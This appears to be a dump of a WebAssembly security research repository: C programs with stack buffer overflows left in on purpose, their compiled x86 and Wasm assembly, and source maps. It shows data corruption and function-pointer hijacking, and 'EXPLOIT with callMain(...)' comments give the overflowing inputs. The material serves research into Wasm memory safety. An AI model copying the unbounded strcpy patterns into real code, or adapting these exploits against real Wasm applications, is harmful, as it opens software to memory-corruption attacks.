https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/stack-buffer-overflow-data-only/out/same-frame-force-order.wasm


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame-force-order.wasm.map:
--------------------------------------------------------------------------------
1 | {"version":3,"sources":["/mnt/Data/Downloads/2019-09-26-wasm-poc-exploits/01-stack-overflow-other-buffer/same-frame-force-order.c"],"names":[],"mappings":"2jBAYA,YACE,wBACA,qBACF,SAUA,YACW,2BAET,MAKA,AAF0B,EAA1B,EAA0B,UAE1B,IAKA,OAZS,EAYT"}


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame-force-order.wasm.s:
--------------------------------------------------------------------------------
  1 | 	.text
  2 | 	.file	"same-frame-force-order.c"
  3 | 	.section	.text.print_bufs,"",@
  4 | 	.hidden	print_bufs              # -- Begin function print_bufs
  5 | 	.globl	print_bufs
  6 | 	.type	print_bufs,@function
  7 | print_bufs:                             # @print_bufs
  8 | 	.functype	print_bufs (i32, i32) -> ()
  9 | 	.local  	i32
 10 | # %bb.0:                                # %entry
 11 | 	global.get	__stack_pointer
 12 | 	i32.const	32
 13 | 	i32.sub 
 14 | 	local.tee	2
 15 | 	global.set	__stack_pointer
 16 | 	local.get	2
 17 | 	local.get	0
 18 | 	i32.store	20
 19 | 	local.get	2
 20 | 	local.get	0
 21 | 	i32.store	16
 22 | 	i32.const	.L.str
 23 | 	local.get	2
 24 | 	i32.const	16
 25 | 	i32.add 
 26 | 	i32.call	iprintf
 27 | 	drop
 28 | 	local.get	2
 29 | 	local.get	1
 30 | 	i32.store	4
 31 | 	local.get	2
 32 | 	local.get	1
 33 | 	i32.store	0
 34 | 	i32.const	.L.str.1
 35 | 	local.get	2
 36 | 	i32.call	iprintf
 37 | 	drop
 38 | 	local.get	2
 39 | 	i32.const	32
 40 | 	i32.add 
 41 | 	global.set	__stack_pointer
 42 |                                         # fallthrough-return-void
 43 | 	end_function
 44 | .Lfunc_end0:
 45 | 	.size	print_bufs, .Lfunc_end0-print_bufs
 46 |                                         # -- End function
 47 | 	.section	.text.main,"",@
 48 | 	.hidden	main                    # -- Begin function main
 49 | 	.globl	main
 50 | 	.type	main,@function
 51 | main:                                   # @main
 52 | 	.functype	main (i32, i32) -> (i32)
 53 | 	.local  	i32, i32
 54 | # %bb.0:                                # %entry
 55 | 	global.get	__stack_pointer
 56 | 	i32.const	16
 57 | 	i32.sub 
 58 | 	local.tee	2
 59 | 	global.set	__stack_pointer
 60 | 	local.get	2
 61 | 	i32.const	8
 62 | 	i32.add 
 63 | 	local.tee	3
 64 | 	i32.const	0
 65 | 	i64.load	.L__const.main.two_bufs+8:p2align=0
 66 | 	i64.store	0
 67 | 	local.get	2
 68 | 	i32.const	0
 69 | 	i64.load	.L__const.main.two_bufs:p2align=0
 70 | 	i64.store	0
 71 | 	local.get	2
 72 | 	local.get	3
 73 | 	call	print_bufs
 74 | 	local.get	2
 75 | 	local.get	1
 76 | 	i32.load	4
 77 | 	i32.call	strcpy
 78 | 	local.get	3
 79 | 	call	print_bufs
 80 | 	local.get	2
 81 | 	i32.const	16
 82 | 	i32.add 
 83 | 	global.set	__stack_pointer
 84 | 	i32.const	0
 85 |                                         # fallthrough-return-value
 86 | 	end_function
 87 | .Lfunc_end1:
 88 | 	.size	main, .Lfunc_end1-main
 89 |                                         # -- End function
 90 | 	.type	.L.str,@object          # @.str
 91 | 	.section	.rodata..L.str,"",@
 92 | .L.str:
 93 | 	.asciz	"&buf_overflow:   %p\n buf_overflow:   %s\n"
 94 | 	.size	.L.str, 41
 95 | 
 96 | 	.type	.L.str.1,@object        # @.str.1
 97 | 	.section	.rodata..L.str.1,"",@
 98 | .L.str.1:
 99 | 	.asciz	"&buf_other_data: %p\n buf_other_data: %s\n"
100 | 	.size	.L.str.1, 41
101 | 
102 | 	.type	.L__const.main.two_bufs,@object # @__const.main.two_bufs
103 | 	.section	.rodata..L__const.main.two_bufs,"",@
104 | .L__const.main.two_bufs:
105 | 	.skip	8
106 | 	.asciz	"BBBBBBB"
107 | 	.size	.L__const.main.two_bufs, 16
108 | 
109 | 
110 | 	.ident	"clang version 10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
111 | 	.globaltype	__stack_pointer, i32
112 | 	.functype	strcpy (i32, i32) -> (i32)
113 | 	.functype	iprintf (i32, i32) -> (i32)
114 | 	.functype	getTempRet0 () -> (i32)
115 | 	.functype	setTempRet0 (i32) -> ()
116 | 	.size	__THREW__, 4
117 | 	.size	__threwValue, 4
118 | 	.section	.custom_section.producers,"",@
119 | 	.int8	1
120 | 	.int8	12
121 | 	.ascii	"processed-by"
122 | 	.int8	1
123 | 	.int8	5
124 | 	.ascii	"clang"
125 | 	.ascii	"\206\001"
126 | 	.ascii	"10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
127 | 	.section	.rodata..L__const.main.two_bufs,"",@
128 | 


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame.native:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/stack-buffer-overflow-data-only/out/same-frame.native


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame.native.s:
--------------------------------------------------------------------------------
 1 | 	.text
 2 | 	.intel_syntax noprefix
 3 | 	.file	"same-frame.c"
 4 | 	.globl	print_bufs              # -- Begin function print_bufs
 5 | 	.p2align	4, 0x90
 6 | 	.type	print_bufs,@function
 7 | print_bufs:                             # @print_bufs
 8 | 	.cfi_startproc
 9 | # %bb.0:
10 | 	push	rbx
11 | 	.cfi_def_cfa_offset 16
12 | 	.cfi_offset rbx, -16
13 | 	mov	rbx, rsi
14 | 	mov	rcx, rdi
15 | 	mov	edi, offset .L.str
16 | 	xor	eax, eax
17 | 	mov	rsi, rcx
18 | 	mov	rdx, rcx
19 | 	call	printf
20 | 	mov	edi, offset .L.str.1
21 | 	xor	eax, eax
22 | 	mov	rsi, rbx
23 | 	mov	rdx, rbx
24 | 	pop	rbx
25 | 	jmp	printf                  # TAILCALL
26 | .Lfunc_end0:
27 | 	.size	print_bufs, .Lfunc_end0-print_bufs
28 | 	.cfi_endproc
29 |                                         # -- End function
30 | 	.globl	main                    # -- Begin function main
31 | 	.p2align	4, 0x90
32 | 	.type	main,@function
33 | main:                                   # @main
34 | 	.cfi_startproc
35 | # %bb.0:
36 | 	push	r15
37 | 	.cfi_def_cfa_offset 16
38 | 	push	r14
39 | 	.cfi_def_cfa_offset 24
40 | 	push	rbx
41 | 	.cfi_def_cfa_offset 32
42 | 	sub	rsp, 32
43 | 	.cfi_def_cfa_offset 64
44 | 	.cfi_offset rbx, -32
45 | 	.cfi_offset r14, -24
46 | 	.cfi_offset r15, -16
47 | 	mov	rax, qword ptr fs:[40]
48 | 	mov	qword ptr [rsp + 24], rax
49 | 	mov	rbx, rsi
50 | 	movabs	rax, 18650200809816642
51 | 	mov	qword ptr [rsp + 8], rax
52 | 	lea	r14, [rsp + 16]
53 | 	lea	r15, [rsp + 8]
54 | 	mov	rdi, r14
55 | 	mov	rsi, r15
56 | 	call	print_bufs
57 | 	mov	rsi, qword ptr [rbx + 8]
58 | 	mov	rdi, r14
59 | 	call	strcpy
60 | 	mov	rdi, r14
61 | 	mov	rsi, r15
62 | 	call	print_bufs
63 | 	mov	rax, qword ptr fs:[40]
64 | 	cmp	rax, qword ptr [rsp + 24]
65 | 	jne	.LBB1_2
66 | # %bb.1:
67 | 	xor	eax, eax
68 | 	add	rsp, 32
69 | 	pop	rbx
70 | 	pop	r14
71 | 	pop	r15
72 | 	ret
73 | .LBB1_2:
74 | 	call	__stack_chk_fail
75 | .Lfunc_end1:
76 | 	.size	main, .Lfunc_end1-main
77 | 	.cfi_endproc
78 |                                         # -- End function
79 | 	.type	.L.str,@object          # @.str
80 | 	.section	.rodata.str1.1,"aMS",@progbits,1
81 | .L.str:
82 | 	.asciz	"&buf_overflow:   %p\n buf_overflow:   %s\n"
83 | 	.size	.L.str, 41
84 | 
85 | 	.type	.L.str.1,@object        # @.str.1
86 | .L.str.1:
87 | 	.asciz	"&buf_other_data: %p\n buf_other_data: %s\n"
88 | 	.size	.L.str.1, 41
89 | 
90 | 
91 | 	.ident	"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"
92 | 	.section	".note.GNU-stack","",@progbits
93 | 


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/stack-buffer-overflow-data-only/out/same-frame.wasm


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame.wasm.map:
--------------------------------------------------------------------------------
1 | {"version":3,"sources":["/mnt/Data/Downloads/2019-09-26-wasm-poc-exploits/01-stack-overflow-same-frame/same-frame.c"],"names":[],"mappings":"2jBAYA,YACE,wBACA,qBACF,SAEA,UASO,cAGL,SAKA,AAFqB,EAArB,EAAqB,UAErB,OAKA"}


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/out/same-frame.wasm.s:
--------------------------------------------------------------------------------
  1 | 	.text
  2 | 	.file	"same-frame.c"
  3 | 	.section	.text.print_bufs,"",@
  4 | 	.hidden	print_bufs              # -- Begin function print_bufs
  5 | 	.globl	print_bufs
  6 | 	.type	print_bufs,@function
  7 | print_bufs:                             # @print_bufs
  8 | 	.functype	print_bufs (i32, i32) -> ()
  9 | 	.local  	i32
 10 | # %bb.0:                                # %entry
 11 | 	global.get	__stack_pointer
 12 | 	i32.const	32
 13 | 	i32.sub 
 14 | 	local.tee	2
 15 | 	global.set	__stack_pointer
 16 | 	local.get	2
 17 | 	local.get	0
 18 | 	i32.store	20
 19 | 	local.get	2
 20 | 	local.get	0
 21 | 	i32.store	16
 22 | 	i32.const	.L.str
 23 | 	local.get	2
 24 | 	i32.const	16
 25 | 	i32.add 
 26 | 	i32.call	iprintf
 27 | 	drop
 28 | 	local.get	2
 29 | 	local.get	1
 30 | 	i32.store	4
 31 | 	local.get	2
 32 | 	local.get	1
 33 | 	i32.store	0
 34 | 	i32.const	.L.str.1
 35 | 	local.get	2
 36 | 	i32.call	iprintf
 37 | 	drop
 38 | 	local.get	2
 39 | 	i32.const	32
 40 | 	i32.add 
 41 | 	global.set	__stack_pointer
 42 |                                         # fallthrough-return-void
 43 | 	end_function
 44 | .Lfunc_end0:
 45 | 	.size	print_bufs, .Lfunc_end0-print_bufs
 46 |                                         # -- End function
 47 | 	.section	.text.main,"",@
 48 | 	.hidden	main                    # -- Begin function main
 49 | 	.globl	main
 50 | 	.type	main,@function
 51 | main:                                   # @main
 52 | 	.functype	main (i32, i32) -> (i32)
 53 | 	.local  	i32
 54 | # %bb.0:                                # %entry
 55 | 	global.get	__stack_pointer
 56 | 	i32.const	16
 57 | 	i32.sub 
 58 | 	local.tee	2
 59 | 	global.set	__stack_pointer
 60 | 	local.get	2
 61 | 	i64.const	18650200809816642
 62 | 	i64.store	8
 63 | 	local.get	2
 64 | 	local.get	2
 65 | 	i32.const	8
 66 | 	i32.add 
 67 | 	call	print_bufs
 68 | 	local.get	2
 69 | 	local.get	1
 70 | 	i32.load	4
 71 | 	i32.call	strcpy
 72 | 	local.get	2
 73 | 	i32.const	8
 74 | 	i32.add 
 75 | 	call	print_bufs
 76 | 	local.get	2
 77 | 	i32.const	16
 78 | 	i32.add 
 79 | 	global.set	__stack_pointer
 80 | 	i32.const	0
 81 |                                         # fallthrough-return-value
 82 | 	end_function
 83 | .Lfunc_end1:
 84 | 	.size	main, .Lfunc_end1-main
 85 |                                         # -- End function
 86 | 	.type	.L.str,@object          # @.str
 87 | 	.section	.rodata..L.str,"",@
 88 | .L.str:
 89 | 	.asciz	"&buf_overflow:   %p\n buf_overflow:   %s\n"
 90 | 	.size	.L.str, 41
 91 | 
 92 | 	.type	.L.str.1,@object        # @.str.1
 93 | 	.section	.rodata..L.str.1,"",@
 94 | .L.str.1:
 95 | 	.asciz	"&buf_other_data: %p\n buf_other_data: %s\n"
 96 | 	.size	.L.str.1, 41
 97 | 
 98 | 
 99 | 	.ident	"clang version 10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
100 | 	.globaltype	__stack_pointer, i32
101 | 	.functype	strcpy (i32, i32) -> (i32)
102 | 	.functype	iprintf (i32, i32) -> (i32)
103 | 	.functype	getTempRet0 () -> (i32)
104 | 	.functype	setTempRet0 (i32) -> ()
105 | 	.size	__THREW__, 4
106 | 	.size	__threwValue, 4
107 | 	.section	.custom_section.producers,"",@
108 | 	.int8	1
109 | 	.int8	12
110 | 	.ascii	"processed-by"
111 | 	.int8	1
112 | 	.int8	5
113 | 	.ascii	"clang"
114 | 	.ascii	"\206\001"
115 | 	.ascii	"10.0.0 (/b/s/w/ir/cache/git/chromium.googlesource.com-external-github.com-llvm-llvm--project 12e915b3fcc55b8394dce3105a24c009e516d153)"
116 | 	.section	.rodata..L.str.1,"",@
117 | 


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow-data-only/same-frame.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | 
 4 | // Stack-based buffer overflow example.
 5 | // Characteristics:
 6 | // - Corrupted other data is in same call frame (and _not_ in the call frame of the caller).
 7 | // - Type of overflowed data is also an array (and _not_ a struct or function ptr).
 8 | // - Behavior after the overflow is "data-only" (and _not_ changing the control flow directly as 
 9 | //   with an overwritten function pointer.)
10 | 
11 | // Put printing into own function as to avoid more stack allocations in main().
12 | __attribute((noinline))
13 | void print_bufs(char * buf_overflow, char * buf_other_data) {
14 |   printf("&buf_overflow:   %p\n buf_overflow:   %s\n", buf_overflow, buf_overflow);
15 |   printf("&buf_other_data: %p\n buf_other_data: %s\n", buf_other_data, buf_other_data);
16 | }
17 | 
18 | int main(int argc, char **argv) {
19 |   // If other_data will be overwritten by an overflow of buf_overflow depends on the placement on
20 |   // the stack. 
21 |   // Clang with -fstack-protector will place buf_overflow[] next to the cookie, so it doesn't work
22 |   // regardless of the order in the source code (see same-frame.native.s, overflow gets placed
23 |   // _after_ other_data).
24 |   // But for Wasm it _does_ work like this:
25 |   // We could imagine other_data to be unsanitized DOM inputs, whereas buf_overflow is user-provided
26 |   // data.
27 |   char buf_other_data[8] = "BBBBBBB\0";
28 |   char buf_overflow[8];
29 | 
30 |   print_bufs(buf_overflow, buf_other_data);
31 | 
32 |   // Overflow happens here.
33 |   strcpy(buf_overflow, argv[1]);
34 | 
35 |   print_bufs(buf_overflow, buf_other_data);
36 | 
37 |   return 0;
38 | }
39 | 
40 | // EXPLOIT with
41 | // callMain(["AAAAAAAAAAAAAAAAAAAAAAAAA"])


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow/main.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | 
 4 | // NOTE Types are not even compatible, but map to the same wasm types.
 5 | void evil(int unused) { printf("evil called\n"); }
 6 | 
 7 | __attribute__((noinline)) void vulnerable(char *bar) {
 8 |   char buf[8];
 9 |   strcpy(buf, bar);  // no bounds checking
10 | }
11 | 
12 | void foo(char *unused) {}
13 | void bar(char *unused) {}
14 | 
15 | int main(int argc, char **argv) {
16 |   printf("argc: %d\nargv: %p\nargv[0]: %s\nargv[1]: %s\n", argc, argv, argv[0],
17 |          argv[1]);
18 | 
19 |   void (*func_ptr)(char *);
20 |   if (argc > 1337) {
21 |     func_ptr = &foo;
22 |   } else if (argc > 42) {
23 |     func_ptr = &bar;
24 |   } else {
25 |     func_ptr = &vulnerable;
26 |   }
27 | 
28 |   // Take address of func_ptr to force it to be stored in memory, not as a local.
29 |   // (We could not use a stack overflow to overwrite a local.)
30 |   printf("&func_ptr: %p\nfunc_ptr:  %p\n", &func_ptr, func_ptr);
31 | 
32 |   vulnerable(argv[1]);
33 | 
34 |   printf("&func_ptr: %p\nfunc_ptr:  %p\n", &func_ptr, func_ptr);
35 | 
36 |   (*func_ptr)("aaaa");
37 | }
38 | 
39 | __attribute__((used)) void dead_code() { printf("%p\n", evil); }
40 | 
41 | // EXPLOIT with
42 | // callMain(["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\04"])


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow/out/main.native:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/stack-buffer-overflow/out/main.native


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow/out/main.native.s:
--------------------------------------------------------------------------------
  1 | 	.text
  2 | 	.intel_syntax noprefix
  3 | 	.file	"main.c"
  4 | 	.globl	evil                    # -- Begin function evil
  5 | 	.p2align	4, 0x90
  6 | 	.type	evil,@function
  7 | evil:                                   # @evil
  8 | 	.cfi_startproc
  9 | # %bb.0:
 10 | 	mov	edi, offset .Lstr
 11 | 	jmp	puts                    # TAILCALL
 12 | .Lfunc_end0:
 13 | 	.size	evil, .Lfunc_end0-evil
 14 | 	.cfi_endproc
 15 |                                         # -- End function
 16 | 	.globl	vulnerable              # -- Begin function vulnerable
 17 | 	.p2align	4, 0x90
 18 | 	.type	vulnerable,@function
 19 | vulnerable:                             # @vulnerable
 20 | 	.cfi_startproc
 21 | # %bb.0:
 22 | 	sub	rsp, 24
 23 | 	.cfi_def_cfa_offset 32
 24 | 	mov	rax, rdi
 25 | 	mov	rcx, qword ptr fs:[40]
 26 | 	mov	qword ptr [rsp + 16], rcx
 27 | 	lea	rdi, [rsp + 8]
 28 | 	mov	rsi, rax
 29 | 	call	strcpy
 30 | 	mov	rax, qword ptr fs:[40]
 31 | 	cmp	rax, qword ptr [rsp + 16]
 32 | 	jne	.LBB1_2
 33 | # %bb.1:
 34 | 	add	rsp, 24
 35 | 	ret
 36 | .LBB1_2:
 37 | 	call	__stack_chk_fail
 38 | .Lfunc_end1:
 39 | 	.size	vulnerable, .Lfunc_end1-vulnerable
 40 | 	.cfi_endproc
 41 |                                         # -- End function
 42 | 	.globl	foo                     # -- Begin function foo
 43 | 	.p2align	4, 0x90
 44 | 	.type	foo,@function
 45 | foo:                                    # @foo
 46 | 	.cfi_startproc
 47 | # %bb.0:
 48 | 	ret
 49 | .Lfunc_end2:
 50 | 	.size	foo, .Lfunc_end2-foo
 51 | 	.cfi_endproc
 52 |                                         # -- End function
 53 | 	.globl	bar                     # -- Begin function bar
 54 | 	.p2align	4, 0x90
 55 | 	.type	bar,@function
 56 | bar:                                    # @bar
 57 | 	.cfi_startproc
 58 | # %bb.0:
 59 | 	ret
 60 | .Lfunc_end3:
 61 | 	.size	bar, .Lfunc_end3-bar
 62 | 	.cfi_endproc
 63 |                                         # -- End function
 64 | 	.globl	main                    # -- Begin function main
 65 | 	.p2align	4, 0x90
 66 | 	.type	main,@function
 67 | main:                                   # @main
 68 | 	.cfi_startproc
 69 | # %bb.0:
 70 | 	push	rbp
 71 | 	.cfi_def_cfa_offset 16
 72 | 	push	rbx
 73 | 	.cfi_def_cfa_offset 24
 74 | 	push	rax
 75 | 	.cfi_def_cfa_offset 32
 76 | 	.cfi_offset rbx, -24
 77 | 	.cfi_offset rbp, -16
 78 | 	mov	rbx, rsi
 79 | 	mov	ebp, edi
 80 | 	mov	rcx, qword ptr [rbx]
 81 | 	mov	r8, qword ptr [rbx + 8]
 82 | 	mov	edi, offset .L.str.1
 83 | 	xor	eax, eax
 84 | 	mov	esi, ebp
 85 | 	mov	rdx, rbx
 86 | 	call	printf
 87 | 	cmp	ebp, 1338
 88 | 	jl	.LBB4_2
 89 | # %bb.1:
 90 | 	mov	qword ptr [rsp], offset foo
 91 | 	mov	edx, offset foo
 92 | 	jmp	.LBB4_5
 93 | .LBB4_2:
 94 | 	cmp	ebp, 43
 95 | 	jl	.LBB4_4
 96 | # %bb.3:
 97 | 	mov	qword ptr [rsp], offset bar
 98 | 	mov	edx, offset bar
 99 | 	jmp	.LBB4_5
100 | .LBB4_4:
101 | 	mov	qword ptr [rsp], offset vulnerable
102 | 	mov	edx, offset vulnerable
103 | .LBB4_5:
104 | 	mov	rbp, rsp
105 | 	mov	edi, offset .L.str.2
106 | 	xor	eax, eax
107 | 	mov	rsi, rbp
108 | 	call	printf
109 | 	mov	rdi, qword ptr [rbx + 8]
110 | 	call	vulnerable
111 | 	mov	rdx, qword ptr [rsp]
112 | 	mov	edi, offset .L.str.2
113 | 	xor	eax, eax
114 | 	mov	rsi, rbp
115 | 	call	printf
116 | 	mov	edi, offset .L.str.3
117 | 	call	qword ptr [rsp]
118 | 	xor	eax, eax
119 | 	add	rsp, 8
120 | 	pop	rbx
121 | 	pop	rbp
122 | 	ret
123 | .Lfunc_end4:
124 | 	.size	main, .Lfunc_end4-main
125 | 	.cfi_endproc
126 |                                         # -- End function
127 | 	.globl	dead_code               # -- Begin function dead_code
128 | 	.p2align	4, 0x90
129 | 	.type	dead_code,@function
130 | dead_code:                              # @dead_code
131 | 	.cfi_startproc
132 | # %bb.0:
133 | 	mov	edi, offset .L.str.4
134 | 	mov	esi, offset evil
135 | 	xor	eax, eax
136 | 	jmp	printf                  # TAILCALL
137 | .Lfunc_end5:
138 | 	.size	dead_code, .Lfunc_end5-dead_code
139 | 	.cfi_endproc
140 |                                         # -- End function
141 | 	.type	.L.str.1,@object        # @.str.1
142 | 	.section	.rodata.str1.1,"aMS",@progbits,1
143 | .L.str.1:
144 | 	.asciz	"argc: %d\nargv: %p\nargv[0]: %s\nargv[1]: %s\n"
145 | 	.size	.L.str.1, 43
146 | 
147 | 	.type	.L.str.2,@object        # @.str.2
148 | .L.str.2:
149 | 	.asciz	"&func_ptr: %p\nfunc_ptr:  %p\n"
150 | 	.size	.L.str.2, 29
151 | 
152 | 	.type	.L.str.3,@object        # @.str.3
153 | .L.str.3:
154 | 	.asciz	"aaaa"
155 | 	.size	.L.str.3, 5
156 | 
157 | 	.type	.L.str.4,@object        # @.str.4
158 | .L.str.4:
159 | 	.asciz	"%p\n"
160 | 	.size	.L.str.4, 4
161 | 
162 | 	.type	.Lstr,@object           # @str
163 | .Lstr:
164 | 	.asciz	"evil called"
165 | 	.size	.Lstr, 12
166 | 
167 | 
168 | 	.ident	"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"
169 | 	.section	".note.GNU-stack","",@progbits
170 | 


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow/out/main.wasm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sola-st/wasm-binary-security/54d660540a0a6979d06afe8a355a29e81507f3d6/attack-primitives/stack-buffer-overflow/out/main.wasm


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow/out/main.wasm.map:
--------------------------------------------------------------------------------
1 | {"version":3,"sources":["/mnt/Data/Downloads/2019-09-26-wasm-poc-exploits/01-stack-overflow/main.c"],"names":[],"mappings":"2mBAIA,CAAwB,EAAyB,EAEjD,YAEE,SACF,SAEA,EAAwB,GAGxB,cACuE,OAArE,+BASW,IATX,AAKW,EADF,SACE,AAEA,EADK,QAGL,QAMX,2BAEW,OAEyC,AAApD,EAAoD,QAApD,UAJA,GAIA,IAEE,AAAF,GAAE,QAIJ,WAGA,YAAyC,cAAsB"}


--------------------------------------------------------------------------------
/attack-primitives/stack-buffer-overflow/out/main.wasm.s:
--------------------------------------------------------------------------------
  1 | 	.text
  2 | 	.file	"main.c"
  3 | 	.section	.text.evil,"",@
  4 | 	.hidden	evil                    # -- Begin function evil
  5 | 	.globl	evil
  6 | 	.type	evil,@function
  7 | evil:                                   # @evil
  8 | 	.functype	evil (i32) -> ()
  9 | # %bb.0:                                # %entry
 10 | 	i32.const	.Lstr
 11 | 	i32.call	puts
 12 | 	drop
 13 |                                         # fallthrough-return-void
 14 | 	end_function
 15 | .Lfunc_end0:
 16 | 	.size	evil, .Lfunc_end0-evil
 17 |                                         # -- End function
 18 | 	.section	.text.vulnerable,"",@
 19 | 	.hidden	vulnerable              # -- Begin function vulnerable
 20 | 	.globl	vulnerable
 21 | 	.type	vulnerable,@function
 22 | vulnerable:                             # @vulnerable
 23 | 	.functype	vulnerable (i32) -> ()
 24 | 	.local  	i32
 25 | # %bb.0:                                # %entry
 26 | 	global.get	__stack_pointer
 27 | 	i32.const	16
 28 | 	i32.sub 
 29 | 	local.tee	1
 30 | 	global.set	__stack_pointer
 31 | 	local.get	1
 32 | 	i32.const	8
 33 | 	i32.add 
 34 | 	local.get	0
 35 | 	i32.call	strcpy
 36 | 	drop
 37 | 	local.get	1
 38 | 	i32.const	16
 39 | 	i32.add 
 40 | 	global.set	__stack_pointer
 41 |                                         # fallthrough-return-void
 42 | 	end_function
 43 | .Lfunc_end1:
 44 | 	.size	vulnerable, .Lfunc_end1-vulnerable
 45 |                                         # -- End function
 46 | 	.section	.text.foo,"",@
 47 | 	.hidden	foo                     # -- Begin function foo
 48 | 	.globl	foo
 49 | 	.type	foo,@function
 50 | foo:                                    # @foo
 51 | 	.functype	foo (i32) -> ()
 52 | # %bb.0:                                # %entry
 53 |                                         # fallthrough-return-void
 54 | 	end_function
 55 | .Lfunc_end2:
 56 | 	.size	foo, .Lfunc_end2-foo
 57 |                                         # -- End function
 58 | 	.section	.text.bar,"",@
 59 | 	.hidden	bar                     # -- Begin function bar
 60 | 	.globl	bar
 61 | 	.type	bar,@function
 62 | bar:                                    # @bar
 63 | 	.functype	bar (i32) -> ()
 64 | # %bb.0:                                # %entry
 65 |                                         # fallthrough-return-void
 66 | 	end_function
 67 | .Lfunc_end3:
 68 | 	.size	bar, .Lfunc_end3-bar
 69 |                                         # -- End function
 70 | 	.section	.text.main,"",@
 71 | 	.hidden	main                    # -- Begin function main
 72 | 	.globl	main
 73 | 	.type	main,@function
 74 | main:                                   # @main
 75 | 	.functype	main (i32, i32) -> (i32)
 76 | 	.local  	i32, i64
 77 | # %bb.0:                                # %entry
 78 | 	global.get	__stack_pointer
 79 | 	i32.const	64
 80 | 	i32.sub 
 81 | 	local.tee	2
 82 | 	global.set	__stack_pointer
 83 | 	local.get	1
 84 | 	i64.load	0:p2align=2
 85 | 	local.set	3
 86 | 	local.get	2
 87 | 	local.get	1
 88 | 	i32.store	36
 89 | 	local.get	2
 90 | 	local.get	3
 91 | 	i64.store	40
 92 | 	local.get	2
 93 | 	local.get	0
 94 | 	i32.store	32
 95 | 	i32.const	.L.str.1
 96 | 	local.get	2
 97 | 	i32.const	32
 98 | 	i32.add 
 99 | 	i32.call	iprintf
100 | 	drop
101 | 	block   	
102 | 	block   	
103 | 	local.get	0
104 | 	i32.const	1338
105 | 	i32.lt_s
106 | 	br_if   	0               # 0: down to label1
107 | # %bb.1:                                # %if.then
108 | 	i32.const	foo
109 | 	local.set	0
110 | 	br      	1               # 1: down to label0
111 | .LBB4_2:                                # %if.else
112 | 	end_block                       # label1:
113 | 	block   	
114 | 	local.get	0
115 | 	i32.const	43
116 | 	i32.lt_s
117 | 	br_if   	0               # 0: down to label2
118 | # %bb.3:                                # %if.then3
119 | 	i32.const	bar
120 | 	local.set	0
121 | 	br      	1               # 1: down to label0
122 | .LBB4_4:                                # %if.else4
123 | 	end_block                       # label2:
124 | 	i32.const	vulnerable
125 | 	local.set	0
126 | .LBB4_5:                                # %if.end5
127 | 	end_block                       # label0:
128 | 	local.get	2
129 | 	local.get	0
130 | 	i32.store	60
131 | 	local.get	2
132 | 	local.get	0
133 | 	i32.store	20
134 | 	local.get	2
135 | 	local.get	2
136 | 	i32.const	60
137 | 	i32.add 
138 | 	i32.store	16
139 | 	i32.const	.L.str.2
140 | 	local.get	2
141 | 	i32.const	16
142 | 	i32.add 
143 | 	i32.call	iprintf
144 | 	drop
145 | 	local.get	1
146 | 	i32.load	4
147 | 	call	vulnerable
148 | 	local.get	2
149 | 	local.get	2
150 | 	i32.load	60
151 | 	i32.store	4
152 | 	local.get	2
153 | 	local.get	2
154 | 	i32.const	60
155 | 	i32.add 
156 | 	i32.store	0
157 | 	i32.const	.L.str.2
158 | 	local.get	2
159 | 	i32.call	iprintf
160 | 	drop
161 | 	i32.const	.L.str.3
162 | 	local.get	2
163 | 	i32.load	60
164 | 	call_indirect	(i32) -> ()
165 | 	local.get	2
166 | 	i32.const	64
167 | 	i32.add 
168 | 	global.set	__stack_pointer
169 | 	i32.const	0
170 |                                         # fallthrough-return-value
171 | 	end_function
172 | .Lfunc_end4:
173 | 	.size	main, .Lfunc_end4-main
174 |                                         # -- End function
175 | 	.section	.text.dead_code,"",@
176 | 	.hidden	dead_code               # -- Begin function dead_code
177 | 	.globl	dead_code
178 | 	.type	dead_code,@function
179 | dead_code:                              # @dead_code
180 | 	.functype	dead_code () -> ()
181 | 	.local  	i32
182 | # %bb.0:                                # %entry
183 | 	global.get	__stack_pointer
184 | 	i32.const	16
185 | 	i32.sub 
186 | 	local.tee	0
187 | 	global.set	__stack_pointer
188 | 	local.get	0
189 | 	i32.const	evil
190 | 	i32.store	0
191 | 	i32.const	.L.str.4
192 | 	local.get	0
193 | 	i32.call	iprintf
194 | 	drop
195 | 	local.get	0
196 | 	i32.const	16
197 | 	i32.add 
198 | 	global.set	__stack_pointer
